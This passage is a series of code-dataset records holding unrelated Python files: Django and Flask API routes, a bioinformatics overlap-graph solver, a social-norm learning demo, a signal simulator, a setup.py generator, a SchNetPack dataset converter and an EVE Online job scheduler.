CrisisListAPIV1, \\\n ListAffectedParticipantsAPIV1\nfrom crisis.views.hl_crisis_participant_views import AssignRequestAsHLAPIView\n\nurlpatterns = [\n path(\"\", CrisisListAPIV1.as_view(), name=\"list_crisies\"),\n path(\n \"/affected-participants/\",\n ListAffectedParticipantsAPIV1.as_view(),\n name=\"list_affected_participants\",\n ),\n path(\n \"/affected-participants//requests/\",\n ListCreateAffectedParticipantRequestsAPIV1.as_view(),\n name=\"list_create_requests\",\n ),\n path(\n \"/affected-participants//requests\"\n \"//assign/\",\n AssignRequestAsHLAPIView.as_view(),\n name=\"assign_request_as_hl\",\n ),\n]\n","sub_path":"crisis/urls_v1.py","file_name":"urls_v1.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"399253226","text":"#!/usr/bin/env python3\n\n# http://rosalind.info/problems/grph/\n\nimport itertools\nfrom fasta_reader import parse_fasta\n\ndef overlap_graph(*strings, order=3):\n prefixes={}\n suffixes={}\n for string_id,string in enumerate(strings):\n prefix=string[:order]\n suffix=string[-order:]\n if not prefix in prefixes:\n prefixes[prefix]=[]\n prefixes[prefix].append(string_id)\n if not suffix in suffixes:\n suffixes[suffix]=[]\n suffixes[suffix].append(string_id)\n for suffix in suffixes:\n if suffix in prefixes:\n for src,dest in itertools.product(suffixes[suffix], prefixes[suffix]):\n if src!=dest:\n yield src, dest\n\ndef main(filename):\n fasta=parse_fasta(filename)\n strings=[case[1] for case in fasta]\n for src,dest in overlap_graph(*strings, order=3):\n print(\"{0} {1}\".format(fasta[src][0][1:], fasta[dest][0][1:]))\n\nif __name__==\"__main__\":\n from sys import argv\n main(argv[-1])\n","sub_path":"Rosalind/overlap_graph.py","file_name":"overlap_graph.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"195283664","text":"import numpy as np\nfrom operator import itemgetter\nimport copy\nimport random\n\ncontext_features = [\"ownCard\",\"haveCard\",\"colleagueAvailable\",\"at_kitchen\",\"AnnInOffice\",\"havePod\",\"at_office\",\"haveCoffee\",\"at_shop\",\"haveMoney\"]\n\n\n#This is an example of a starting context\ncontext = {\ncontext_features[0] : True,\ncontext_features[1] : False,\ncontext_features[2] : True,\ncontext_features[3] : False,\ncontext_features[4] : True,\ncontext_features[5] : False,\ncontext_features[6] : True,\ncontext_features[7] : False,\ncontext_features[8] : False,\ncontext_features[9] : True\n}\n\nlocations = {\n\"kitchen\" : np.array([0,0]),\n\"office\" : np.array([1,0]),\n\"shop\" : np.array([0,10])\n}\ndef specific_action_value_features(c,l,place): #given a context and locations, produce\n action_value_features = {}\n actions = [\"getKitchenCoffee\",\"getOfficeCoffee\",\"getShopCoffee\"]\n if place==\"at_kitchen\": #We're in the kitchen\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",0],\n \"getOfficeCoffee\" : [\"good\",\"none\",np.linalg.norm(locations[\"office\"]-locations[\"kitchen\"])],\n \"getShopCoffee\" : [\"veryGood\",\"high\",np.linalg.norm(locations[\"shop\"]-locations[\"kitchen\"])],\n }\n elif place==\"at_office\": #We're in the office\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",np.linalg.norm(locations[\"kitchen\"]-locations[\"office\"])],\n \"getOfficeCoffee\" : [\"good\",\"none\",0],\n \"getShopCoffee\" : [\"veryGood\",\"high\",np.linalg.norm(locations[\"shop\"]-locations[\"office\"])],\n }\n pass\n elif place==\"at_shop\": #We're in the shop\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",np.linalg.norm(locations[\"kitchen\"]-locations[\"shop\"])],\n \"getOfficeCoffee\" : [\"good\",\"none\",np.linalg.norm(locations[\"office\"]-locations[\"shop\"])],\n \"getShopCoffee\" : [\"veryGood\",\"high\",0],\n }\n else:\n return \"SOMETHING IS MESSED UP!\"\n return action_value_features\n\ndef generate_action_value_features(c,l): #given a context and locations, produce\n action_value_features = {}\n actions = [\"getKitchenCoffee\",\"getOfficeCoffee\",\"getShopCoffee\"]\n if c[\"at_kitchen\"]: #We're in the kitchen\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",0],\n \"getOfficeCoffee\" : [\"good\",\"none\",np.linalg.norm(locations[\"office\"]-locations[\"kitchen\"])],\n \"getShopCoffee\" : [\"veryGood\",\"high\",np.linalg.norm(locations[\"shop\"]-locations[\"kitchen\"])],\n }\n elif c[\"at_office\"]: #We're in the office\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",np.linalg.norm(locations[\"kitchen\"]-locations[\"office\"])],\n \"getOfficeCoffee\" : [\"good\",\"none\",0],\n \"getShopCoffee\" : [\"veryGood\",\"high\",np.linalg.norm(locations[\"shop\"]-locations[\"office\"])],\n }\n pass\n elif c[\"at_shop\"]: #We're in the shop\n action_value_features = {\n \"getKitchenCoffee\" : [\"bad\",\"none\",np.linalg.norm(locations[\"kitchen\"]-locations[\"shop\"])],\n \"getOfficeCoffee\" : [\"good\",\"none\",np.linalg.norm(locations[\"office\"]-locations[\"shop\"])],\n \"getShopCoffee\" : [\"veryGood\",\"high\",0],\n }\n else:\n return \"SOMETHING IS MESSED UP!\"\n return action_value_features\n\n#print(context)\n#print(generate_action_value_features(context,locations)) \n\n\ndef print_rollout(pv,c,l):\n actions = [\"getKitchenCoffee\",\"getOfficeCoffee\",\"getShopCoffee\"]\n real_avf = generate_action_value_features(c,l)\n\n\n best_pv_action = \"\"\n counter = 0\n print(\"PRINTING PV\")\n print(pv)\n for pv_el in pv: #for each value tuple\n print(pv_el)\n if real_avf[\"getKitchenCoffee\"] == pv_el:\n best_pv_action = \"getKitchenCoffee\"\n print(counter)\n break\n elif real_avf[\"getOfficeCoffee\"] == pv_el:\n best_pv_action = \"getOfficeCoffee\"\n print(counter)\n break\n elif real_avf[\"getShopCoffee\"] == pv_el:\n best_pv_action = \"getShopCoffee\"\n print(counter)\n break\n counter += 1\n print(best_pv_action)\n \n\n av = generate_action_value_features(c,l)\n if c[\"at_kitchen\"]:\n print(\"Currently in the kitchen\")\n cur_place = \"kitchen\"\n if c[\"at_office\"]:\n print(\"Currently in the office\")\n cur_place = \"office\"\n if c[\"at_shop\"]:\n print(\"Currently in the shop\")\n cur_place = \"shop\"\n\n if best_pv_action in actions:\n if best_pv_action == actions[0]:\n if c[\"ownCard\"]:\n print(\"Get a staff card I own to access the coffee.\")\n elif c[\"colleagueAvailable\"]:\n print(\"Get colleague to given me a coffee card to access coffe\") \n else :\n return\n \n print(\"Go to the Kitchen that is this far away from the \"+str(cur_place+str(av[\"getKitchenCoffee\"][2])))\n\n print(\"Get the coffee in the kitchen with the accessed card\")\n return\n \n elif best_pv_action == actions[1]:\n if c[\"AnnInOffice\"]:\n print(\"Go to the Office that is this far away from the current spot:\"+str(cur_place)+\" \" +str(av[\"getOfficeCoffee\"][2]))\n print(\"Get a Pod in office\")\n print(\"Get coffe in the office\")\n else:\n return\n return\n elif best_pv_action == actions[2]:\n print(\"Go to the Shop that is this far away from the current spot:\"+str(cur_place)+\" \"+str(av[\"getShopCoffee\"][2]))\n print(\"Get Cofffe at the shop\")\n print(\"Pay shop the money\")\n return\n \n\n\ndef learn_social_norms(c,l): #Learn the best ordering of values for a given context and a specific set of actions.\n #get randomly initialized ordering of actions\n real_action_values = generate_action_value_features(c,l)\n\n set_of_context_features = []\n set_of_context_features.append(specific_action_value_features(c,l,\"at_kitchen\").values())\n set_of_context_features.append(specific_action_value_features(c,l,\"at_office\").values())\n set_of_context_features.append(specific_action_value_features(c,l,\"at_shop\").values())\n flat_cf = [item for sublist in set_of_context_features for item in sublist]\n print(flat_cf)\n #print(set_of_context_features)\n\n for f in flat_cf:\n print(f)\n\n training_loops = 5\n num_pv = 10\n num_top = 5\n num_new = num_pv-num_top\n\n\n pvo = [] #potential value orderings\n for i in range(num_pv):\n random.shuffle(flat_cf)\n x = copy.copy(flat_cf)\n pvo.append(x)\n\n for i in range(training_loops):\n community_feedback = []\n print(\"training loop: \"+str(i))\n counter = 0\n for pv in pvo:\n print(\"CONTEXT 1: IN OFFICE\")\n c[\"at_shop\"] = False\n c[\"at_office\"] = True\n print_rollout(pv,c,l)\n\n print(\"CONTEXT 2: IN KITCHEN\")\n c[\"at_office\"] = False\n c[\"at_kitchen\"] = True\n print_rollout(pv,c,l)\n\n print(\"CONTEXT 3: IN SHOP\")\n c[\"at_kitchen\"] = False\n c[\"at_shop\"] = True\n print_rollout(pv,c,l)\n feedback = raw_input(\"How much did you like this behavior?\")\n community_feedback.append((float(feedback),counter))\n counter += 1\n\n print(community_feedback)\n\n #change the pvo list to be better based on community feedback\n sorted_cf = sorted(community_feedback, key=itemgetter(0))\n sorted_cf.reverse()\n print(sorted_cf)\n\n new_pvo = []\n for top in range(num_top):\n new_pvo.append(pvo[sorted_cf[top][1]]) \n\n for i in range(num_new):\n random.shuffle(flat_cf)\n x = copy.copy(flat_cf)\n new_pvo.append(x)\n pvo=new_pvo\n \n \n\n #print(c)\n #print(l)\n\nlearn_social_norms(context,locations)\n\n","sub_path":"social_norm.py","file_name":"social_norm.py","file_ext":"py","file_size_in_byte":8025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"241668328","text":"# Copyright (c) James Percent, Byron Galbraith and Unlock contributors.\n# All rights reserved.\n# Redistribution and use in source and binary forms, with or without modification,\n# are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n#\n# 3. Neither the name of Unlock nor the names of its contributors may be used\n# to endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR\n# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON\n# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.import socket\n \nimport numpy as np\nimport random\n\n__author__ = 'jpercent'\n\nclass RMSSignalGenerator(object):\n '''\n Generates simulated device samples. Each invocation of the\n generate method returns a table of samples. The generate method determines sample values\n by consulting an unlock.state.SequenceState. The state returns a tuple of True/False values,\n one foreach channel. A state channel value that is True results in sample value, for the\n corresponding channel, that is above the threshold; a False value results in value above\n the min, but below the threshold.\n \n channels: number of channels\n minmax: list of tuples denoting the min and max values of a channel\n thresholds: list of channel thresholds\n state: an unlock.state.SequenceState. provides a means to dynamically configure\n which channels of a given set of samples are above/below threshold values\n samples: default number of samples per request\n ''' \n def __init__(self, channels, minmax, thresholds, state, samples, seed=31337):\n assert channels == len(thresholds) and channels == len(minmax)\n self.channels = channels\n self.min = 0\n self.max = 1\n self.minmax = minmax\n self.thresholds = thresholds\n self.samples = samples\n self.state = state\n self.state.start()\n self.generate_sample = self.simple_sample_gen\n self.random = random.Random()\n self.random.seed(seed)\n \n def generate_samples(self, samples=None):\n if samples == None:\n samples = self.samples\n \n ret = np.zeros((samples, self.channels))\n for sample in range(samples):\n ret[sample] = self.generate_sample(self.state.state())\n self.state.step()\n return ret\n \n def simple_sample_gen(self, state_value):\n assert self.channels == len(state_value)\n sample = np.zeros(self.channels)\n for i in range(self.channels):\n if state_value[i] == True:\n sample[i] = self.random.randint(self.thresholds[i], self.minmax[i][self.max])\n elif state_value[i] == False:\n sample[i] = self.random.randint(self.minmax[i][self.min], self.thresholds[i]-1)\n else:\n raise Exception('invalid state')\n return sample\n \nif __name__ == '__main__':\n # example \n from unlock.state import SequenceState\n channels = 4\n minmax = [(0,10), (-10, 10), (9,100), (0,7)]\n thresholds = [ 8, 5, 80, 5]\n samples = 12\n seq = [(False, False, False, False), (True, False, False, False), (True, True, False, False),\n (False, False, False, True), (False, True, False, False), (True, False, True, False),\n (False, False, True, False), (False, False, False, True),\n (True, False, False, True), (False, True, False, True), (True, True, True, False),\n (True, True, True, True)]\n state = SequenceState(seq)\n print(state.sequence)\n gen = RMSSignalGenerator(channels, minmax, thresholds, state, samples)\n sample_values = gen.generate_samples()\n for i in range(len(seq)):\n print (\"Sequence value = \", seq[i])\n print(\"Normalized Sample = \", sample_values[i] - np.array(thresholds))\n print('-'*80)\n ","sub_path":"unlock/util/signal.py","file_name":"signal.py","file_ext":"py","file_size_in_byte":4991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"602239646","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"This module defines :class:`SetupMaker` class\"\"\"\n\nfrom __future__ import absolute_import, print_function\n\nimport os\nimport sys\nfrom functools import partial\n\nfrom . import settings\nfrom .base import BaseMaker\nfrom ..utils.helpers import read_setup_cfg\n\n\nclass SetupMaker(BaseMaker):\n \"\"\"SetupMaker creates *setup.py* file inside the project directory.\n\n Args:\n projectDir (str): absolute path of project directory to create\n force (bool): option for overwriting if the file exists.\n\n \"\"\"\n def __init__(self, projectDir, force, **kwargs):\n self.projectDir = projectDir\n self.force = force\n\n self._update_settings()\n\n def _update_settings(self):\n settings.registry.update(read_setup_cfg(os.path.join(self.projectDir, 'setup.cfg')))\n\n _format_multi_line_list = self._format\n _format_single_line_list = partial(self._format, indent=0, sep=', ')\n _format_multi_line_dict = partial(self._format, quote=False)\n\n info = {\n 'exclude':\n _format_single_line_list(settings.registry.get('exclude')),\n 'python_requires':\n self._get_python_requires(settings.registry.get('classifiers')),\n 'classifiers':\n _format_multi_line_list(settings.registry.get('classifiers')),\n 'install_requires':\n _format_multi_line_list(settings.registry.get('install_requires')),\n 'setup_requires':\n _format_multi_line_list(settings.registry.get('setup_requires')),\n 'tests_require':\n _format_multi_line_list(settings.registry.get('tests_require')),\n 'extras_require':\n _format_multi_line_dict(settings.registry.get('extras_require')),\n }\n\n settings.registry.update(info)\n\n @staticmethod\n def _format(text, quote=True, indent=8, sep=',\\n'):\n \"\"\" convert data read from setup.cfg to the suitable format for setup.py\n\n \"\"\"\n if not text:\n return ''\n\n split_sep = '\\n' if text.find('\\n') != -1 else '; '\n\n if quote:\n opt_list = list(map(repr, text.split(split_sep)))\n else:\n opt_list = text.split(split_sep)\n\n INDENT = ' ' * indent\n separator = sep + INDENT\n return separator.join(opt_list)\n\n @staticmethod\n def _get_python_requires(classifiers):\n \"\"\"Infer the version of required python version from the given classifiers list\n\n Args:\n classifiers (str): the value of 'classifiers' in settings.registry\n\n Returns:\n\n \"\"\"\n count = 0\n min_ver = 'HIGH_VERSION'\n classifiers_list = classifiers.split('\\n')\n for c in classifiers_list:\n if c.startswith('Programming Language :: Python'):\n count += 1\n ver = c.split('::')[-1].strip()\n if ver < min_ver:\n min_ver = ver\n\n # if we can not determine the required_python_version, apply the current\n if min_ver == 'HIGH_VERSION':\n min_ver = sys.version.split()[0]\n\n sign = '>=' if count >= 2 else '=='\n\n return sign + min_ver\n\n def generate(self):\n return self.write_file('setup',\n os.path.join(self.projectDir, 'setup.py'))\n","sub_path":"templator/makers/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"545605573","text":"import schnetpack as spk\nimport readline\nimport os\nfrom sys import argv\nimport numpy as np\nfrom ase import Atoms\nfrom ase.units import Bohr\nfrom schnetpack.data import AtomsData\ndef read_dataset(path,numberofgeoms,filename):\n\n atom_buffer = []\n property_buffer = []\n charge_buffer = []\n metadata = {}\n for geom in range(1,1+numberofgeoms):\n\n #Geometry and Atomtypes\n xyz_file = open(path+\"/xyz-files/%07d.xyz\"%geom,\"r\").readlines()\n charge = int(xyz_file[1].split()[2])\n natom = int(xyz_file[0].split()[0])\n E=[]\n R=np.zeros((natom,3))\n for iatom in range(natom):\n E.append(xyz_file[iatom+2].split()[0])\n for xyz in range(3):\n R[iatom][xyz] = float(xyz_file[iatom+2].split()[1+xyz])/Bohr\n atoms = Atoms(E,R)\n\n #Properties\n prop_file = open(path+\"/properties/%07d\"%geom,\"r\").readlines()\n singlets = 0\n doublets = 0\n triplets = 0\n quartets = 0\n _energy = False\n energy = np.zeros((1))\n _soc = False\n soc = np.zeros((1))\n _force = False\n force = np.zeros((1))\n _dipole = False\n dipole = np.zeros((1))\n _nac = False\n nac = np.zeros((1))\n _dyson = False\n property_matrix=False\n dyson = np.zeros((1))\n property_list=[]\n for line in prop_file:\n if line.startswith(\"Singlets\"):\n singlets = int(line.split()[1])\n elif line.startswith(\"Doublets\"):\n doublets = int(line.split()[1])\n elif line.startswith(\"Triplets\"):\n triplets = int(line.split()[1])\n elif line.startswith(\"Quartets\"):\n quartets = int(line.split()[1])\n elif line.startswith(\"Energy\"):\n if int(line.split()[-1])==int(1):\n _energy = True\n property_list.append('energy')\n elif line.startswith(\"Dipole\"):\n if int(line.split()[-1])==int(1):\n _dipole = True\n property_list.append('dipoles')\n elif line.startswith(\"SOC\"):\n if int(line.split()[-1])==int(1):\n _soc = True\n property_list.append('socs')\n elif line.startswith(\"Grad\"):\n if int(line.split()[-1])==int(1):\n _force = True\n property_list.append('forces')\n property_list.append('has_forces')\n elif line.startswith(\"Given_grad\"):\n has_force=[]\n if int(line.split()[-1])==int(1):\n _has_forces = True\n has_force.append(1)\n property_list.append('has_forces')\n else:\n has_force.append(0)\n has_force=np.array(has_force)\n elif line.startswith(\"NAC\"):\n if int(line.split()[-1])==int(1):\n _nac = True\n property_list.append('nacs')\n elif line.startswith('DYSON'):\n if int(line.split()[-1])==int(1):\n _dyson = True\n property_list.append('dyson')\n else:\n continue\n nmstates = singlets + 2*doublets + 3*triplets + 4*quartets\n iline = -1\n for line in prop_file:\n iline+=1\n if line.startswith(\"! Energy\"):\n n_energy = singlets + doublets + triplets + quartets\n #int(line.split()[2])\n energy = [] #np.zeros((n_energy))\n eline = prop_file[iline+1].split()\n for i in range(singlets):\n energy.append(float(eline[i]))\n for i in range(singlets,singlets+doublets):\n energy.append(float(eline[i]))\n for i in range(singlets+2*doublets,singlets+2*doublets+triplets):\n energy.append(float(eline[i]))\n for i in range(singlets+2*doublets+3*triplets,singlets+2*doublets+3*triplets+quartets):\n energy.append(float(eline[i]))\n energy=np.array(energy)\n #dipole is read in as mu(1,1), mu(1,2), mu(1,3),...\n elif line.startswith(\"! Dipole\"):\n n_dipole = int((singlets*(singlets+1))/2+(doublets*(doublets+1))/2+(triplets*(triplets+1))/2+(quartets*(quartets+1))/2)\n dipole = np.zeros((n_dipole,3))\n dline = prop_file[iline+1].split()\n for i in range(n_dipole):\n for xyz in range(3):\n dipole[i][xyz] = float(dline[i+n_dipole*xyz])\n elif line.startswith(\"! SpinOrbitCoupling\"):\n n_soc = int(line.split()[2])\n soc = [] #np.zeros((n_soc))\n sline = prop_file[iline+1].split()\n for i in range(n_soc):\n soc.append(float(sline[i]))\n soc=np.array(soc)\n elif line.startswith(\"! Gradient\"):\n n_grad = int(line.split()[2])\n force = np.zeros((singlets+triplets+doublets+quartets,natom,3))\n index = -1\n gline = prop_file[iline+1].split()\n for istate in range(singlets+doublets):\n for iatom in range(natom):\n for xyz in range(3):\n index+=1\n force[istate][iatom][xyz] = -float(gline[index])\n index+=(natom*3*doublets)\n for istate in range(singlets+doublets,singlets+doublets+triplets):\n for iatom in range(natom):\n for xyz in range(3):\n index+=1\n force[istate][iatom][xyz] = -float(gline[index])\n index+=(2*natom*3*triplets)\n for istate in range(singlets+doublets+triplets,singlets+doublets+triplets+quartets):\n for iatom in range(natom):\n for xyz in range(3):\n index+=1\n force[istate][iatom][xyz] = -float(gline[index])\n #nonadiabatic couplings are also defined as vectors\n elif line.startswith(\"! Nonadiabatic coupling\"):\n n_nac = int(int(line.split()[3])/3/natom)\n #dimension: nstates(coupled), natoms,xyz(3)\n nac = np.zeros((n_nac,natom,3))\n nacline = prop_file[iline+1].split()\n index=-1\n for i in range(n_nac):\n for iatom in range(natom):\n for xyz in range(3):\n index+=1\n nac[i][iatom][xyz] = float(nacline[index])\n elif line.startswith('! Dyson'):\n n_dyson = int(line.split()[-1])\n property_matrix = []\n sline = prop_file[iline+1].split()\n for i in range(n_dyson):\n property_matrix.append(float(sline[i]))\n property_matrix=np.array(property_matrix)\n else:\n continue\n\n available_properties = { 'energy' : energy,\n 'socs' : soc,\n 'forces' : force,\n 'has_forces': has_force,\n 'nacs' : nac,\n 'dipoles' : dipole,\n 'dyson' : property_matrix }\n #Append list \n charge_buffer.append(charge)\n atom_buffer.append(atoms)\n property_buffer.append(available_properties)\n #get schnet format\n metadata['n_singlets'] = int(singlets)\n metadata['n_doublets'] = int(doublets)\n metadata['n_triplets'] = int(triplets)\n metadata['n_quartets'] = int(quartets)\n states = ''\n for singlet in range(singlets):\n states += 'S '\n for dublet in range(2*doublets):\n states += 'D '\n for triplet in range(3*triplets):\n states += 'T '\n for quartet in range(4*quartets):\n states += 'Q '\n metadata['states'] = states\n reference = 'QC' # TODO put your method here\n phasecorrected = False\n metadata['phasecorrected'] = phasecorrected\n metadata['ReferenceMethod'] = reference\n spk_data = AtomsData(filename,available_properties=property_list)\n spk_data.add_systems(atom_buffer,property_buffer)\n #get metadata\n spk_data.set_metadata(metadata)\n\nif __name__ == \"__main__\":\n\n try:\n script, filename, natoms, filename = argv\n except IOError:\n print(\"USAGE: Script.py path_to_trainingset numberofgeometries filename\")\n\n#units should be atomic units always!\n#forces are -gradients!\npath = argv[1]\nnumberofgeoms = int(argv[2])\nfilename = str(argv[3])\n\nread_dataset(path,numberofgeoms,filename)\n","sub_path":"src/scripts/transform_dataset.py","file_name":"transform_dataset.py","file_ext":"py","file_size_in_byte":8875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"493608932","text":"from api.tools.entities import posts, threads\nfrom flask import Blueprint, request\nimport json\nfrom api.helpers import choose_required, intersection, related_exists, get_json\nfrom api.tools.DBconnect import *\n\nmodule = Blueprint('post', __name__, url_prefix='/db/api/post')\n\n@module.route(\"/create/\", methods=[\"POST\"])\ndef create():\n con = connect()\n content = request.json\n required_data = [\"user\", \"forum\", \"thread\", \"message\", \"date\"]\n optional_data = [\"parent\", \"isApproved\", \"isHighlighted\", \"isEdited\", \"isSpam\", \"isDeleted\"]\n optional = intersection(request=content, values=optional_data)\n try:\n choose_required(data=content, required=required_data)\n post = posts.create(connect=con,date=content[\"date\"], thread=content[\"thread\"],\n message=content[\"message\"], user=content[\"user\"],\n forum=content[\"forum\"], optional=optional)\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n\n\n@module.route(\"/details/\", methods=[\"GET\"])\ndef details():\n con = connect()\n content = get_json(request)\n required_data = [\"post\"]\n related = related_exists(content)\n try:\n choose_required(data=content, required=required_data)\n post = posts.details(con,content[\"post\"], related=related)\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n\n\n@module.route(\"/list/\", methods=[\"GET\"])\ndef post_list():\n con = connect()\n content = get_json(request)\n try:\n identifier = content[\"forum\"]\n entity = \"forum\"\n except KeyError:\n try:\n identifier = content[\"thread\"]\n entity = \"thread\"\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n\n optional = intersection(request=content, values=[\"limit\", \"order\", \"since\"])\n try:\n p_list = posts.posts_list(connect=con,entity=entity, params=optional, identifier=identifier, related=[])\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": p_list})\n\n\n@module.route(\"/remove/\", methods=[\"POST\"])\ndef remove():\n con = connect()\n content = get_json(request)\n required_data = [\"post\"]\n try:\n choose_required(data=content, required=required_data)\n post = posts.remove_restore(connect=con,post_id=content[\"post\"], status=1)\n threads.dec_posts_count(con,content[\"post\"])\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n\n\n@module.route(\"/restore/\", methods=[\"POST\"])\ndef restore():\n con = connect()\n content = request.json\n required_data = [\"post\"]\n try:\n choose_required(data=content, required=required_data)\n threads.inc_posts_count(con,content[\"post\"])\n post = posts.remove_restore(connect=con,post_id=content[\"post\"], status=0)\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n\n\n@module.route(\"/update/\", methods=[\"POST\"])\ndef update():\n con = connect()\n content = request.json\n required_data = [\"post\", \"message\"]\n try:\n choose_required(data=content, required=required_data)\n post = posts.update(connect=con,update_id=content[\"post\"], message=content[\"message\"])\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n\n\n@module.route(\"/vote/\", methods=[\"POST\"])\ndef vote():\n con = connect()\n content = request.json\n required_data = [\"post\", \"vote\"]\n try:\n choose_required(data=content, required=required_data)\n post = posts.vote(connect = con,vote_id=content[\"post\"], vote_type=content[\"vote\"])\n except Exception as e:\n con.close()\n return json.dumps({\"code\": 1, \"response\": (e.message)})\n con.close()\n return json.dumps({\"code\": 0, \"response\": post})\n","sub_path":"api/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"162203032","text":"import turtle as t\nimport random as rnd\nimport math\n\ndef main():\n \"\"\"\n Draws randomly positioned radial patterns repeatedly\n \"\"\"\n width, height = setup()\n while True:\n x, y = get_random_coords(width, height)\n draw_radial(x, y)\n\n\ndef draw_radial(x, y):\n \"\"\"\n Draws a single instance of the radial pattern\n Number Number -> None\n \"\"\"\n DEGS_IN_CIRC = 360\n INCR_DEGS = 12\n stroke_color = 'green'\n t.goto(x, y)\n for angle in range(0, DEGS_IN_CIRC, INCR_DEGS):\n t.setheading(angle)\n fill_color = (math.cos(math.radians(angle)) + 1)/2\n draw_blade(stroke_color, fill_color)\n\n\ndef draw_blade(stroke_color, fill_color):\n \"\"\"\n Draws a single blade of the pattern\n Color Color -> None\n \"\"\"\n BOTTOM_EDGE = 200\n OUTER_EDGE = 50\n BOTTOM_TIP_ANGLE = 60\n TOP_TIP_ANGLE = 130\n TOP_EDGE = 230\n t.pd()\n t.fillcolor(fill_color, fill_color, fill_color)\n t.begin_fill()\n t.pencolor(stroke_color)\n t.forward(BOTTOM_EDGE)\n t.left(BOTTOM_TIP_ANGLE)\n t.forward(OUTER_EDGE)\n t.left(TOP_TIP_ANGLE)\n t.forward(TOP_EDGE)\n t.end_fill()\n t.pu()\n\ndef setup():\n \"\"\"\n Sets up the screen and returns width and height\n None -> Number Number\n \"\"\"\n BG_COLOR = (0.8, 0.95, 0.9)\n screen = t.getscreen()\n screen.bgcolor(BG_COLOR)\n width = screen.window_width()\n height = screen.window_height()\n t.shape(\"turtle\")\n t.delay(0)\n t.speed(\"fastest\")\n t.pu()\n return screen.window_width(), screen.window_height()\n\n\ndef get_random_coords(width, height):\n '''\n Returns random pixel positions within a screen area\n '''\n w = rnd.randint(0, width-1)\n h = rnd.randint(0, height-1)\n return w - width/2, h - height/2\n\n\nmain()","sub_path":"week06/02_radial_design_functions.py","file_name":"02_radial_design_functions.py","file_ext":"py","file_size_in_byte":1765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"376823969","text":"import random\n\nimport requests\n\nfrom anoikis.api.eve.esi import characters as esi_characters\nfrom anoikis.api.exceptions import InvalidToken, ExpiredToken\n\nfrom apoptosis.models import session \nfrom apoptosis.models import UserModel, CharacterModel, CharacterLocationHistory, EVESolarSystemModel\nfrom apoptosis.models import CharacterCorporationHistory, EVECorporationModel, EVETypeModel, CharacterShipHistory\nfrom apoptosis.models import CharacterSkillModel, EVESkillModel\n\nfrom apoptosis.log import eve_log, job_log\n\nfrom apoptosis.eve.sso import refresh_access_token\n\nfrom datetime import datetime\n\nfrom apoptosis.queue.celery import celery_queue\n\n\ndef setup():\n job_log.info(\"user.setup\")\n\n for user in session.query(UserModel).all():\n setup_user(user)\n\ndef setup_user(user):\n job_log.debug(\"user.setup_user {}\".format(user))\n\n for character in user.characters:\n if character.refresh_token is not None:\n setup_character(character)\n\ndef setup_character(character):\n job_log.debug(\"user.setup_character {}\".format(character.character_name))\n\n refresh_character_location.apply_async(args=(character.id,), countdown=random.randint(0, 300))\n refresh_character_ship.apply_async(args=(character.id,), countdown=random.randint(0, 300))\n refresh_character_corporation.apply_async(args=(character.id,), countdown=random.randint(0, 300))\n 